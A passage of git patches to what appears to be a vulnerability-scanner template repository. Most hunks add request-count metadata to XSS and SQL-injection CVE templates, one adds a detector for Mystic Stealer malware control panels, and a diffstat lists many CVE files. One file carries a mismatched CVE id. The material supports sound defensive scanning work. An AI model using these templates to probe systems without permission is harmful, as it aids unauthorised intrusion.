b/http/cves/2022/CVE-2022-44948.yaml index a57e89e948..ace0d61224 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2022-44948 cwe-id: CWE-79 metadata: + max-request: 3 verified: true tags: cve,cve2022,rukovoditel,xss,stored-xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index e489ae03bd..8aba354bac 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2022-44949 cwe-id: CWE-79 metadata: + max-request: 3 verified: true tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index 4688775a8f..fa5ccf4308 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2022-44950 cwe-id: CWE-79 metadata: + max-request: 3 verified: true tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index f6ced50538..134a3e3e27 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2022-44951 cwe-id: CWE-79 metadata: + max-request: 3 verified: true tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index 581ba7e576..853c12a6ac 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2022-44952 cwe-id: CWE-79 metadata: + max-request: 4 verified: true tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml index 9cbdadc655..85b3275759 100644 --- a/http/cves/2023/CVE-2023-0514.yaml +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2023-0514 cwe-id: CWE-79 metadata: + max-request: 2 verified: true tags: cve,cve2023,membership-database,wp,wp-plugin,wordpress,authenticated,xss diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index 8d9da20898..9880b39653 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -6,17 +6,18 @@ info: severity: critical description: | The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks. - remediation: Fixed in version 3.1.5 reference: - https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7 - https://wordpress.org/plugins/supportcandy/ - https://nvd.nist.gov/vuln/detail/CVE-2023-1730 + remediation: Fixed in version 3.1.5 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-1730 cwe-id: CWE-89 metadata: + max-request: 1 verified: "true" tags: cve,cve2023,sqli,wpscan,wordpress,supportcandy,unauth diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index 35d0e2d486..756fe9eb12 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2023-1835 cwe-id: CWE-79 metadata: + max-request: 2 verified: true tags: cve,cve2023,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml index ee72893fa9..181c8838ad 100644 --- a/http/cves/2023/CVE-2023-1890.yaml +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -17,6 +17,7 @@ info: cve-id: CVE-2023-1890 cwe-id: CWE-79 metadata: + max-request: 2 verified: true tags: cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tablesome diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml index 7b89d30332..6340ce2838 100644 --- a/http/cves/2023/CVE-2023-2023.yaml +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -6,17 +6,18 @@ info: severity: medium description: | Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - remediation: Fixed in version 3.7.3 reference: - https://wpscan.com/vulnerability/8859843a-a8c2-4f7a-8372-67049d6ea317 - https://wordpress.org/plugins/custom-404-pro/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2023 + remediation: Fixed in version 3.7.3 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-2023 cwe-id: CWE-79 metadata: + max-request: 2 verified: true tags: cve,cve2023,xss,wordpress,wp-plugin,authenticated,custom-404-pro diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml index d61fec1bf7..65cadf6c86 100644 --- a/http/cves/2023/CVE-2023-2272.yaml +++ b/http/cves/2023/CVE-2023-2272.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2023-2272 cwe-id: CWE-79 metadata: + max-request: 2 verified: true tags: cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tiempocom diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml index ce6d92452d..039e4bc2b7 100644 --- a/http/cves/2023/CVE-2023-30256.yaml +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -17,6 +17,7 @@ info: cve-id: CVE-2023-30256 cwe-id: CWE-79 metadata: + max-request: 1 verified: "true" tags: cve,cve2023,xss,webkul-qloapps,unauth diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml index 3a90d33596..2eb57628c9 100644 --- a/http/cves/2023/CVE-2023-30777.yaml +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -17,6 +17,7 @@ info: cve-id: CVE-2023-30777 cwe-id: CWE-79 metadata: + max-request: 2 verified: true tags: cve,cve2023,advance-custom-field,wp,wp-plugin,wordpress,authenticated,xss diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml index eb0ef67c53..2fcc599684 100644 --- a/http/cves/2023/CVE-2023-36287.yaml +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2023-36287 cwe-id: CWE-79 metadata: + max-request: 1 verified: "true" tags: cve,cve2023,xss,webkul-qloapps,unauth diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml index d7051ea8a8..96ef30dd4f 100644 --- a/http/cves/2023/CVE-2023-36289.yaml +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2023-36289 cwe-id: CWE-79 metadata: + max-request: 1 verified: "true" tags: cve,cve2023,xss,webkul-qloapps,unauth diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index e30965bf9a..13cf5d9f35 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2023-30256 cwe-id: CWE-79 metadata: + max-request: 1 verified: "true" tags: cve,cve2023,xss,pos,codekop,unauth diff --git a/http/exposed-panels/qdpm-login-panel.yaml b/http/exposed-panels/qdpm-login-panel.yaml index ca2afd9f4f..44d96a0a02 100644 --- a/http/exposed-panels/qdpm-login-panel.yaml +++ b/http/exposed-panels/qdpm-login-panel.yaml @@ -5,8 +5,9 @@ info: author: theamanrawat severity: info metadata: - verified: "true" + max-request: 2 shodan-query: http.favicon.hash:762074255 + verified: "true" tags: panel,qdpm,login http: diff --git a/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml b/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml index a4b713cde8..78d8998c41 100644 --- a/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml +++ b/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml @@ -11,6 +11,7 @@ info: - https://wordpress.org/plugins/photo-gallery/ remediation: Fixed in version 1.6.3 metadata: + max-request: 1 verified: true tags: sqli,wpscan,wordpress,contus-video-gallery,unauth diff --git a/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml b/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml index 599bc56d83..1be0243294 100644 --- a/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml +++ b/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml @@ -10,6 +10,7 @@ info: - https://wpscan.com/vulnerability/f3be48f5-ae2c-4e27-80ca-664829b8fba3 - https://wordpress.org/plugins/leaguemanager/ metadata: + max-request: 1 verified: true tags: sqli,wp,wp-plugin,wordpress,leaguemanager,unauth diff --git a/http/vulnerabilities/wordpress/notificationx-sqli.yaml b/http/vulnerabilities/wordpress/notificationx-sqli.yaml index 7a6a6c809f..d3a4408c33 100644 --- a/http/vulnerabilities/wordpress/notificationx-sqli.yaml +++ b/http/vulnerabilities/wordpress/notificationx-sqli.yaml @@ -11,6 +11,7 @@ info: - https://wordpress.org/plugins/notificationx/ remediation: Fixed in version 2.3.12 metadata: + max-request: 2 verified: true tags: sqli,wp,wp-plugin,wordpress,notificationx-sql-injection diff --git a/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml b/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml index 92da0a19bf..b06399b3c7 100644 --- a/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml +++ b/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml @@ -11,6 +11,7 @@ info: - https://wordpress.org/plugins/zero-spam/ remediation: Fixed in version 2.2.0 metadata: + max-request: 1 verified: true tags: wp,wp-plugin,wordpress,zero-spam,sqli,unauth From 5b6c47b74eee59e1900919d1830259ef7f9c1abb Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 7 Jul 2023 16:54:31 +0530 Subject: [PATCH 499/609] Mystic Stealer Panel --- http/exposed-panels/c2/mystic-stealer.yaml | 24 ++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 http/exposed-panels/c2/mystic-stealer.yaml diff --git a/http/exposed-panels/c2/mystic-stealer.yaml b/http/exposed-panels/c2/mystic-stealer.yaml new file mode 100644 index 0000000000..55bfe035cb --- /dev/null +++ b/http/exposed-panels/c2/mystic-stealer.yaml @@ -0,0 +1,24 @@ +id: mystic-stealer + +info: + name: Mystic Stealer Panel - Detect + author: pussycat0x + severity: info + description: | + Mystic Stealer panel were detected. + metadata: + shodan-query: http.title:"Mystic Stealer" + verified: "true" + tags: tech,rat,mystic-stealer,c2,panel + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + matchers: + - type: dsl + dsl: + - "status_code == 200 && contains(body, 'Mystic Stealer')" + condition: and \ No newline at end of file From 0a681ec0bba2eb8f8926c0f006743e4c8a1c6283 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 7 Jul 2023 16:56:27 +0530 Subject: [PATCH 500/609] removed empty lines --- http/cnvd/2021/CNVD-2021-09650.yaml | 2 -- http/cnvd/2021/CNVD-2021-10543.yaml | 2 -- http/cnvd/2021/CNVD-2021-14536.yaml | 2 -- http/cnvd/2021/CNVD-2021-15822.yaml | 2 -- http/cnvd/2021/CNVD-2021-15824.yaml | 2 -- http/cnvd/2021/CNVD-2021-17369.yaml | 2 -- http/cnvd/2021/CNVD-2021-26422.yaml | 2 -- http/cnvd/2021/CNVD-2021-28277.yaml | 2 -- http/cnvd/2021/CNVD-2021-30167.yaml | 2 -- http/cnvd/2021/CNVD-2021-49104.yaml | 2 -- http/cnvd/2022/CNVD-2022-03672.yaml | 2 -- http/cnvd/2022/CNVD-2022-42853.yaml | 2 -- http/cves/2000/CVE-2000-0114.yaml | 2 -- http/cves/2002/CVE-2002-1131.yaml | 2 -- http/cves/2004/CVE-2004-0519.yaml | 2 -- http/cves/2005/CVE-2005-2428.yaml | 2 -- http/cves/2005/CVE-2005-3344.yaml | 2 -- http/cves/2005/CVE-2005-4385.yaml | 2 -- http/cves/2006/CVE-2006-1681.yaml | 2 -- http/cves/2006/CVE-2006-2842.yaml | 2 -- http/cves/2007/CVE-2007-0885.yaml | 2 -- http/cves/2007/CVE-2007-4504.yaml | 2 -- http/cves/2007/CVE-2007-4556.yaml | 2 -- http/cves/2007/CVE-2007-5728.yaml | 2 -- http/cves/2008/CVE-2008-1059.yaml | 2 -- http/cves/2008/CVE-2008-1061.yaml | 3 --- http/cves/2008/CVE-2008-2398.yaml | 2 -- http/cves/2008/CVE-2008-2650.yaml | 2 -- http/cves/2008/CVE-2008-4668.yaml | 2 -- http/cves/2008/CVE-2008-4764.yaml | 2 -- http/cves/2008/CVE-2008-5587.yaml | 2 -- http/cves/2008/CVE-2008-6080.yaml | 2 -- http/cves/2008/CVE-2008-6172.yaml | 2 -- http/cves/2008/CVE-2008-6222.yaml | 2 -- http/cves/2008/CVE-2008-6465.yaml | 2 -- http/cves/2008/CVE-2008-6668.yaml | 2 -- http/cves/2008/CVE-2008-6982.yaml | 2 -- http/cves/2009/CVE-2009-0545.yaml | 2 -- http/cves/2009/CVE-2009-0932.yaml | 2 -- http/cves/2009/CVE-2009-1151.yaml | 2 -- http/cves/2009/CVE-2009-1496.yaml | 2 -- http/cves/2009/CVE-2009-1558.yaml | 2 -- http/cves/2009/CVE-2009-1872.yaml | 2 -- http/cves/2009/CVE-2009-2015.yaml | 2 -- http/cves/2009/CVE-2009-2100.yaml | 2 -- http/cves/2009/CVE-2009-3053.yaml | 2 -- http/cves/2009/CVE-2009-3318.yaml | 2 -- http/cves/2009/CVE-2009-4202.yaml | 2 -- http/cves/2009/CVE-2009-4223.yaml | 2 -- http/cves/2009/CVE-2009-4679.yaml | 2 -- http/cves/2009/CVE-2009-5020.yaml | 2 -- http/cves/2009/CVE-2009-5114.yaml | 1 - http/cves/2010/CVE-2010-0157.yaml | 1 - http/cves/2010/CVE-2010-0219.yaml | 2 -- http/cves/2010/CVE-2010-0467.yaml | 1 - http/cves/2010/CVE-2010-0696.yaml | 2 -- http/cves/2010/CVE-2010-0759.yaml | 1 - http/cves/2010/CVE-2010-0942.yaml | 1 - http/cves/2010/CVE-2010-0943.yaml | 2 -- http/cves/2010/CVE-2010-0944.yaml | 1 - http/cves/2010/CVE-2010-0972.yaml | 1 - http/cves/2010/CVE-2010-0982.yaml | 1 - http/cves/2010/CVE-2010-0985.yaml | 1 - http/cves/2010/CVE-2010-1056.yaml | 1 - http/cves/2010/CVE-2010-1081.yaml | 1 - http/cves/2010/CVE-2010-1217.yaml | 1 - http/cves/2010/CVE-2010-1219.yaml | 1 - http/cves/2010/CVE-2010-1302.yaml | 1 - http/cves/2010/CVE-2010-1304.yaml | 1 - http/cves/2010/CVE-2010-1305.yaml | 1 - http/cves/2010/CVE-2010-1306.yaml | 1 - http/cves/2010/CVE-2010-1307.yaml | 1 - http/cves/2010/CVE-2010-1308.yaml | 1 - http/cves/2010/CVE-2010-1312.yaml | 1 - http/cves/2010/CVE-2010-1313.yaml | 1 - http/cves/2010/CVE-2010-1314.yaml | 1 - http/cves/2010/CVE-2010-1315.yaml | 1 - http/cves/2010/CVE-2010-1340.yaml | 1 - http/cves/2010/CVE-2010-1345.yaml | 1 - http/cves/2010/CVE-2010-1352.yaml | 1 - http/cves/2010/CVE-2010-1353.yaml | 2 -- http/cves/2010/CVE-2010-1354.yaml | 1 - http/cves/2010/CVE-2010-1429.yaml | 2 -- http/cves/2010/CVE-2010-1461.yaml | 1 - http/cves/2010/CVE-2010-1469.yaml | 1 - http/cves/2010/CVE-2010-1470.yaml | 1 - http/cves/2010/CVE-2010-1471.yaml | 1 - http/cves/2010/CVE-2010-1472.yaml | 1 - http/cves/2010/CVE-2010-1473.yaml | 1 - http/cves/2010/CVE-2010-1474.yaml | 2 -- http/cves/2010/CVE-2010-1475.yaml | 2 -- http/cves/2010/CVE-2010-1476.yaml | 1 - http/cves/2010/CVE-2010-1478.yaml | 2 -- http/cves/2010/CVE-2010-1491.yaml | 1 - http/cves/2010/CVE-2010-1494.yaml | 1 - http/cves/2010/CVE-2010-1495.yaml | 1 - http/cves/2010/CVE-2010-1531.yaml | 1 - http/cves/2010/CVE-2010-1532.yaml | 1 - http/cves/2010/CVE-2010-1533.yaml | 1 - http/cves/2010/CVE-2010-1534.yaml | 1 - http/cves/2010/CVE-2010-1535.yaml | 2 -- http/cves/2010/CVE-2010-1540.yaml | 2 -- http/cves/2010/CVE-2010-1601.yaml | 2 -- http/cves/2010/CVE-2010-1602.yaml | 2 -- http/cves/2010/CVE-2010-1603.yaml | 2 -- http/cves/2010/CVE-2010-1607.yaml | 2 -- http/cves/2010/CVE-2010-1653.yaml | 2 -- http/cves/2010/CVE-2010-1657.yaml | 2 -- http/cves/2010/CVE-2010-1658.yaml | 2 -- http/cves/2010/CVE-2010-1659.yaml | 2 -- http/cves/2010/CVE-2010-1714.yaml | 2 -- http/cves/2010/CVE-2010-1715.yaml | 2 -- http/cves/2010/CVE-2010-1717.yaml | 2 -- http/cves/2010/CVE-2010-1718.yaml | 2 -- http/cves/2010/CVE-2010-1719.yaml | 2 -- http/cves/2010/CVE-2010-1722.yaml | 2 -- http/cves/2010/CVE-2010-1723.yaml | 2 -- http/cves/2010/CVE-2010-1858.yaml | 1 - http/cves/2010/CVE-2010-1870.yaml | 2 -- http/cves/2010/CVE-2010-1875.yaml | 2 -- http/cves/2010/CVE-2010-1878.yaml | 2 -- http/cves/2010/CVE-2010-1952.yaml | 1 - http/cves/2010/CVE-2010-1953.yaml | 2 -- http/cves/2010/CVE-2010-1954.yaml | 1 - http/cves/2010/CVE-2010-1955.yaml | 1 - http/cves/2010/CVE-2010-1956.yaml | 1 - http/cves/2010/CVE-2010-1957.yaml | 2 -- http/cves/2010/CVE-2010-1977.yaml | 2 -- http/cves/2010/CVE-2010-1979.yaml | 2 -- http/cves/2010/CVE-2010-1980.yaml | 2 -- http/cves/2010/CVE-2010-1981.yaml | 2 -- http/cves/2010/CVE-2010-1982.yaml | 2 -- http/cves/2010/CVE-2010-1983.yaml | 2 -- http/cves/2010/CVE-2010-2033.yaml | 2 -- http/cves/2010/CVE-2010-2034.yaml | 2 -- http/cves/2010/CVE-2010-2035.yaml | 2 -- http/cves/2010/CVE-2010-2036.yaml | 2 -- http/cves/2010/CVE-2010-2037.yaml | 2 -- http/cves/2010/CVE-2010-2045.yaml | 2 -- http/cves/2010/CVE-2010-2050.yaml | 2 -- http/cves/2010/CVE-2010-2122.yaml | 2 -- http/cves/2010/CVE-2010-2128.yaml | 2 -- http/cves/2010/CVE-2010-2259.yaml | 2 -- http/cves/2010/CVE-2010-2307.yaml | 2 -- http/cves/2010/CVE-2010-2507.yaml | 2 -- http/cves/2010/CVE-2010-2680.yaml | 2 -- http/cves/2010/CVE-2010-2682.yaml | 2 -- http/cves/2010/CVE-2010-2857.yaml | 2 -- http/cves/2010/CVE-2010-2861.yaml | 2 -- http/cves/2010/CVE-2010-2918.yaml | 2 -- http/cves/2010/CVE-2010-2920.yaml | 2 -- http/cves/2010/CVE-2010-3203.yaml | 2 -- http/cves/2010/CVE-2010-3426.yaml | 2 -- http/cves/2010/CVE-2010-4231.yaml | 2 -- http/cves/2010/CVE-2010-4239.yaml | 2 -- http/cves/2010/CVE-2010-4282.yaml | 2 -- http/cves/2010/CVE-2010-4617.yaml | 2 -- http/cves/2010/CVE-2010-4719.yaml | 2 -- http/cves/2010/CVE-2010-4769.yaml | 2 -- http/cves/2010/CVE-2010-4977.yaml | 2 -- http/cves/2010/CVE-2010-5028.yaml | 2 -- http/cves/2010/CVE-2010-5278.yaml | 2 -- http/cves/2010/CVE-2010-5286.yaml | 2 -- http/cves/2011/CVE-2011-0049.yaml | 2 -- http/cves/2011/CVE-2011-1669.yaml | 2 -- http/cves/2011/CVE-2011-2744.yaml | 2 -- http/cves/2011/CVE-2011-2780.yaml | 2 -- http/cves/2011/CVE-2011-3315.yaml | 2 -- http/cves/2011/CVE-2011-4336.yaml | 2 -- http/cves/2011/CVE-2011-4618.yaml | 2 -- http/cves/2011/CVE-2011-4624.yaml | 2 -- http/cves/2011/CVE-2011-4804.yaml | 2 -- http/cves/2011/CVE-2011-4926.yaml | 2 -- http/cves/2011/CVE-2011-5106.yaml | 2 -- http/cves/2011/CVE-2011-5107.yaml | 2 -- http/cves/2011/CVE-2011-5179.yaml | 2 -- http/cves/2011/CVE-2011-5181.yaml | 2 -- http/cves/2011/CVE-2011-5265.yaml | 2 -- http/cves/2012/CVE-2012-0392.yaml | 2 -- http/cves/2012/CVE-2012-0394.yaml | 2 -- http/cves/2012/CVE-2012-0896.yaml | 2 -- http/cves/2012/CVE-2012-0901.yaml | 2 -- http/cves/2012/CVE-2012-0981.yaml | 2 -- http/cves/2012/CVE-2012-0991.yaml | 2 -- http/cves/2012/CVE-2012-0996.yaml | 2 -- http/cves/2012/CVE-2012-1226.yaml | 2 -- http/cves/2012/CVE-2012-1835.yaml | 2 -- http/cves/2012/CVE-2012-2371.yaml | 2 -- http/cves/2012/CVE-2012-3153.yaml | 2 -- http/cves/2012/CVE-2012-4242.yaml | 2 -- http/cves/2012/CVE-2012-4253.yaml | 2 -- http/cves/2012/CVE-2012-4273.yaml | 2 -- http/cves/2012/CVE-2012-4547.yaml | 2 -- http/cves/2012/CVE-2012-4768.yaml | 2 -- http/cves/2012/CVE-2012-4878.yaml | 2 -- http/cves/2012/CVE-2012-4889.yaml | 2 -- http/cves/2012/CVE-2012-4940.yaml | 2 -- http/cves/2012/CVE-2012-5913.yaml | 2 -- http/cves/2013/CVE-2013-1965.yaml | 2 -- http/cves/2013/CVE-2013-2248.yaml | 2 -- http/cves/2013/CVE-2013-2251.yaml | 2 -- http/cves/2013/CVE-2013-2287.yaml | 2 -- http/cves/2013/CVE-2013-3526.yaml | 2 -- http/cves/2013/CVE-2013-3827.yaml | 2 -- http/cves/2013/CVE-2013-4117.yaml | 2 -- http/cves/2013/CVE-2013-4625.yaml | 2 -- http/cves/2013/CVE-2013-5528.yaml | 2 -- http/cves/2013/CVE-2013-5979.yaml | 2 -- http/cves/2013/CVE-2013-6281.yaml | 2 -- http/cves/2013/CVE-2013-7091.yaml | 2 -- http/cves/2013/CVE-2013-7240.yaml | 2 -- http/cves/2013/CVE-2013-7285.yaml | 1 - http/cves/2014/CVE-2014-10037.yaml | 2 -- http/cves/2014/CVE-2014-1203.yaml | 2 -- http/cves/2014/CVE-2014-2321.yaml | 2 -- http/cves/2014/CVE-2014-2323.yaml | 2 -- http/cves/2014/CVE-2014-2383.yaml | 2 -- http/cves/2014/CVE-2014-2908.yaml | 2 -- http/cves/2014/CVE-2014-2962.yaml | 2 -- http/cves/2014/CVE-2014-3120.yaml | 2 -- http/cves/2014/CVE-2014-3206.yaml | 2 -- http/cves/2014/CVE-2014-3704.yaml | 2 -- http/cves/2014/CVE-2014-3744.yaml | 2 -- http/cves/2014/CVE-2014-4210.yaml | 2 -- http/cves/2014/CVE-2014-4513.yaml | 2 -- http/cves/2014/CVE-2014-4535.yaml | 2 -- http/cves/2014/CVE-2014-4536.yaml | 2 -- http/cves/2014/CVE-2014-4539.yaml | 2 -- http/cves/2014/CVE-2014-4544.yaml | 2 -- http/cves/2014/CVE-2014-4550.yaml | 2 -- http/cves/2014/CVE-2014-4558.yaml | 2 -- http/cves/2014/CVE-2014-4561.yaml | 2 -- http/cves/2014/CVE-2014-4592.yaml | 2 -- http/cves/2014/CVE-2014-4940.yaml | 2 -- http/cves/2014/CVE-2014-4942.yaml | 2 -- http/cves/2014/CVE-2014-5111.yaml | 2 -- http/cves/2014/CVE-2014-5258.yaml | 2 -- http/cves/2014/CVE-2014-5368.yaml | 2 -- http/cves/2014/CVE-2014-6271.yaml | 2 -- http/cves/2014/CVE-2014-6287.yaml | 2 -- http/cves/2014/CVE-2014-6308.yaml | 2 -- http/cves/2014/CVE-2014-8676.yaml | 2 -- http/cves/2014/CVE-2014-8682.yaml | 2 -- http/cves/2014/CVE-2014-8799.yaml | 2 -- http/cves/2014/CVE-2014-9094.yaml | 2 -- http/cves/2014/CVE-2014-9119.yaml | 2 -- http/cves/2014/CVE-2014-9444.yaml | 2 -- http/cves/2014/CVE-2014-9606.yaml | 2 -- http/cves/2014/CVE-2014-9607.yaml | 2 -- http/cves/2014/CVE-2014-9608.yaml | 2 -- http/cves/2014/CVE-2014-9609.yaml | 2 -- http/cves/2014/CVE-2014-9614.yaml | 2 -- http/cves/2014/CVE-2014-9615.yaml | 2 -- http/cves/2014/CVE-2014-9617.yaml | 2 -- http/cves/2014/CVE-2014-9618.yaml | 2 -- http/cves/2015/CVE-2015-0554.yaml | 2 -- http/cves/2015/CVE-2015-1000005.yaml | 2 -- http/cves/2015/CVE-2015-1000010.yaml | 2 -- http/cves/2015/CVE-2015-1000012.yaml | 2 -- http/cves/2015/CVE-2015-1427.yaml | 2 -- http/cves/2015/CVE-2015-1503.yaml | 2 -- http/cves/2015/CVE-2015-1579.yaml | 2 -- http/cves/2015/CVE-2015-1880.yaml | 2 -- http/cves/2015/CVE-2015-2067.yaml | 2 -- http/cves/2015/CVE-2015-2068.yaml | 2 -- http/cves/2015/CVE-2015-2080.yaml | 2 -- http/cves/2015/CVE-2015-2166.yaml | 2 -- http/cves/2015/CVE-2015-2196.yaml | 2 -- http/cves/2015/CVE-2015-2755.yaml | 2 -- http/cves/2015/CVE-2015-2807.yaml | 2 -- http/cves/2015/CVE-2015-2863.yaml | 2 -- http/cves/2015/CVE-2015-2996.yaml | 2 -- http/cves/2015/CVE-2015-3035.yaml | 2 -- http/cves/2015/CVE-2015-3224.yaml | 2 -- http/cves/2015/CVE-2015-3337.yaml | 2 -- http/cves/2015/CVE-2015-3648.yaml | 2 -- http/cves/2015/CVE-2015-3897.yaml | 2 -- http/cves/2015/CVE-2015-4050.yaml | 2 -- http/cves/2015/CVE-2015-4062.yaml | 2 -- http/cves/2015/CVE-2015-4063.yaml | 2 -- http/cves/2015/CVE-2015-4074.yaml | 2 -- http/cves/2015/CVE-2015-4127.yaml | 2 -- http/cves/2015/CVE-2015-4414.yaml | 2 -- http/cves/2015/CVE-2015-4632.yaml | 2 -- http/cves/2015/CVE-2015-4666.yaml | 2 -- http/cves/2015/CVE-2015-4668.yaml | 2 -- http/cves/2015/CVE-2015-4694.yaml | 2 -- http/cves/2015/CVE-2015-5354.yaml | 2 -- http/cves/2015/CVE-2015-5461.yaml | 2 -- http/cves/2015/CVE-2015-5469.yaml | 2 -- http/cves/2015/CVE-2015-5471.yaml | 2 -- http/cves/2015/CVE-2015-5531.yaml | 2 -- http/cves/2015/CVE-2015-5688.yaml | 2 -- http/cves/2015/CVE-2015-6477.yaml | 2 -- http/cves/2015/CVE-2015-6544.yaml | 2 -- http/cves/2015/CVE-2015-6920.yaml | 2 -- http/cves/2015/CVE-2015-7245.yaml | 2 -- http/cves/2015/CVE-2015-7297.yaml | 2 -- http/cves/2015/CVE-2015-7377.yaml | 2 -- http/cves/2015/CVE-2015-7450.yaml | 2 -- http/cves/2015/CVE-2015-7780.yaml | 2 -- http/cves/2015/CVE-2015-7823.yaml | 2 -- http/cves/2015/CVE-2015-8349.yaml | 2 -- http/cves/2015/CVE-2015-8399.yaml | 2 -- http/cves/2015/CVE-2015-8813.yaml | 2 -- http/cves/2015/CVE-2015-9312.yaml | 2 -- http/cves/2015/CVE-2015-9414.yaml | 2 -- http/cves/2015/CVE-2015-9480.yaml | 2 -- http/cves/2016/CVE-2016-0957.yaml | 2 -- http/cves/2016/CVE-2016-1000126.yaml | 2 -- http/cves/2016/CVE-2016-1000127.yaml | 2 -- http/cves/2016/CVE-2016-1000128.yaml | 2 -- http/cves/2016/CVE-2016-1000129.yaml | 3 --- http/cves/2016/CVE-2016-1000130.yaml | 2 -- http/cves/2016/CVE-2016-1000131.yaml | 2 -- http/cves/2016/CVE-2016-1000132.yaml | 2 -- http/cves/2016/CVE-2016-1000133.yaml | 2 -- http/cves/2016/CVE-2016-1000134.yaml | 2 -- http/cves/2016/CVE-2016-1000135.yaml | 2 -- http/cves/2016/CVE-2016-1000136.yaml | 2 -- http/cves/2016/CVE-2016-1000137.yaml | 2 -- http/cves/2016/CVE-2016-1000138.yaml | 2 -- http/cves/2016/CVE-2016-1000139.yaml | 2 -- http/cves/2016/CVE-2016-1000140.yaml | 2 -- http/cves/2016/CVE-2016-1000141.yaml | 2 -- http/cves/2016/CVE-2016-1000142.yaml | 2 -- http/cves/2016/CVE-2016-1000143.yaml | 2 -- http/cves/2016/CVE-2016-1000146.yaml | 2 -- http/cves/2016/CVE-2016-1000148.yaml | 2 -- http/cves/2016/CVE-2016-1000149.yaml | 2 -- http/cves/2016/CVE-2016-1000152.yaml | 2 -- http/cves/2016/CVE-2016-1000153.yaml | 2 -- http/cves/2016/CVE-2016-1000154.yaml | 2 -- 